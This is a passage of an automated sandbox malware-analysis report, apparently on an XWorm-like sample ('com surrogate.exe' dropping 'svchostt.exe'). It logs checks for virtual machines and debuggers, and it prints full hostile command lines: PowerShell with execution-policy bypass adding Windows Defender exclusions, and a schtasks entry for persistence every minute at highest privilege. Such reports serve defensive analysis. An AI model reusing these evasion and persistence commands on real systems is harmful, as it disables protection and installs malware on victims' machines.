                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\com surrogate.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\com surrogate.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: com surrogate.exe, svchostt.exe.0.drBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\com surrogate.exeMemory allocated: 10F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeMemory allocated: 1AC60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\svchostt.exeMemory allocated: 1050000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exeMemory allocated: 1AB40000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exeMemory allocated: C70000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exeMemory allocated: 1A980000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exeMemory allocated: 1360000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exeMemory allocated: 1AF00000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exeMemory allocated: 1480000 memory reserve | memory write watch
                      Source: C:\Users\user\svchostt.exeMemory allocated: 1AFE0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\com surrogate.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\com surrogate.exeWindow / User API: threadDelayed 1933Jump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeWindow / User API: threadDelayed 7819Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5611Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4202Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8052Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1488Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7310Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2352Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6629
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3021
                      Source: C:\Users\user\Desktop\com surrogate.exe TID: 3152Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1544Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912Thread sleep count: 7310 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 600Thread sleep count: 2352 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332Thread sleep count: 6629 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5780Thread sleep count: 3021 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\svchostt.exe TID: 5184Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\svchostt.exe TID: 5668Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\svchostt.exe TID: 6668Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\svchostt.exe TID: 5912Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\com surrogate.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\com surrogate.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\svchostt.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\svchostt.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\svchostt.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\svchostt.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\com surrogate.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\svchostt.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\catroot2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\AppxSip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\OpcServices.DLL
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\wshext.dll
                      Source: svchostt.exe.0.drBinary or memory string: vmware
                      Source: com surrogate.exe, 00000000.00000002.2904869847.000000001BAB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: com surrogate.exe, 00000000.00000002.2904869847.000000001BAB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\Desktop\com surrogate.exeCode function: 0_2_00007FFD9B7E7A41 CheckRemoteDebuggerPresent,0_2_00007FFD9B7E7A41
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\svchostt.exeProcess token adjusted: Debug
                      Source: C:\Users\user\svchostt.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\com surrogate.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe'
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'com surrogate.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchostt.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe"Jump to behavior
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002CD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002CD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002CD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002CD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                      Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002CD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2b
                      Source: C:\Users\user\Desktop\com surrogate.exeQueries volume information: C:\Users\user\Desktop\com surrogate.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\com surrogate.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
